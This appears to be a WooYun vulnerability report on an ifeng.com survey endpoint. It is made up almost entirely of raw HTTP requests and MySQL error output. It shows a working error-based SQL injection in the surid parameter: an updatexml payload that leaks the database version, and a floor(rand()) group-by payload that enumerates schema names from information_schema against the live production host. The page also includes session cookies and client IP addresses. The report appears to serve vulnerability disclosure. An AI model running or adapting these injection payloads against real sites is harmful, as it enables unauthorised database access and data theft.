WooYun.org

GET /survey/request.php?callback=jsonp1424157819222&act=postsurvey&surid=2616'&sur%5B5491%5D%5B%5D=21758&ref=http://bbs.ifeng.com/talk/special/index.shtml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://bbs.ifeng.com/talk/special/index.shtml
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: survey.ifeng.com
Cookie: Q37_sid=SoraD6; Q37_oldtopics=D5898341D18938212D18939153D18938341D18938190D18939052D18937946D18404838D18938230D17144416D18492322D18870175D18689737D18846108D15119594D15109969D15180577D18936949D18936953D18938709D18938715D18938707D18938712D; Q37_fid284=1424155688; Q37_visitedfid=349D491D500D497D469D379D364D354D728D218D550; Q37_fid218=1424143815; Q37_fid364=1424146788; Q37_fid354=1424072043; Q37_fid453=1424138799; Q37_fid379=1424144618; Q37_fid469=1424080280; Q37_fid497=1424087992; Q37_fid499=1424143254; Q37_fid500=1424148976; Q37_fid491=1424080870
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 17 Feb 2015 07:32:18 GMT
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Load-Balancing: survey144
Set-Cookie: array_pkic2=rs_http_pkandsurvey_145
Connection: Keep-alive
Content-Length: 1187
<div style="position:absolute;font-size:11px;font-family:verdana,arial;background:#EBEBEB;padding:0.5em;">
				<b>MySQL Error</b><br>
				<b>Message</b>: MySQL Query Error<br>
				<b>SQL</b>: INSERT INTO sur_survey_user (`surid`, `userinfo`) VALUES ('2616', '{"callback":"jsonp1424157819222","act":"postsurvey","surid":"2616\\'","sur":{"5491":["21758"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtml","ip":"116.231.89.203"}')<br>
				<b>Error</b>: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sur":{"5491":["21758"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtm' at line 1<br>
				<b>Errno.</b>: 1064<br>
				<a href="http://faq.comsenz.com/?type=mysql&dberrno=1064&dberror=You%20have%20an%20error%20in%20your%20SQL%20syntax%3B%20check%20the%20manual%20that%20corresponds%20to%20your%20MySQL%20server%20version%20for%20the%20right%20syntax%20to%20use%20near%20%27sur%22%3A%7B%225491%22%3A%5B%2221758%22%5D%7D%2C%22ref%22%3A%22http%3A%5C%2F%5C%2Fbbs.ifeng.com%5C%2Ftalk%5C%2Fspecial%5C%2Findex.shtm%27%20at%20line%201" target="_blank">Click here to seek help.</a>
				</div>

http://survey.ifeng.com/survey/request.php?callback=jsonp1424157819222&act=postsurvey&sur%5B5491%5D%5B%5D=2175&ref=http://bbs.ifeng.com/talk/special/index.shtml&surid=2616%27%2b%20updatexml%281,concat%280x7e,%28SELECT%20@@version%29,0x7e%29,1%29%29%23
 MySQL Error
Message: MySQL Query Error
SQL: INSERT INTO sur_survey_user (`surid`, `userinfo`) VALUES ('2616', '{"callback":"jsonp1424157819222","act":"postsurvey","sur":{"5491":["2175"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtml","surid":"2616\\'+ updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))#","ip":"116.237.88.204"}')
Error: XPATH syntax error: '~5.1.45-Community-Server-log~'
Errno.: 1105
Click here to seek help.

http://survey.ifeng.com/survey/request.php?callback=jsonp1424157819222&act=postsurvey&sur%5B5491%5D%5B%5D=2175&ref=http://bbs.ifeng.com/talk/special/index.shtml&surid=2616%27%2b%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20distinct%20concat%280x7e,schema_name,0x7e%29%20FROM%20information_schema.schemata%20LIMIT%201,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%29%23
Error: Duplicate entry '~ifeng_survey~1' for key 'group_key'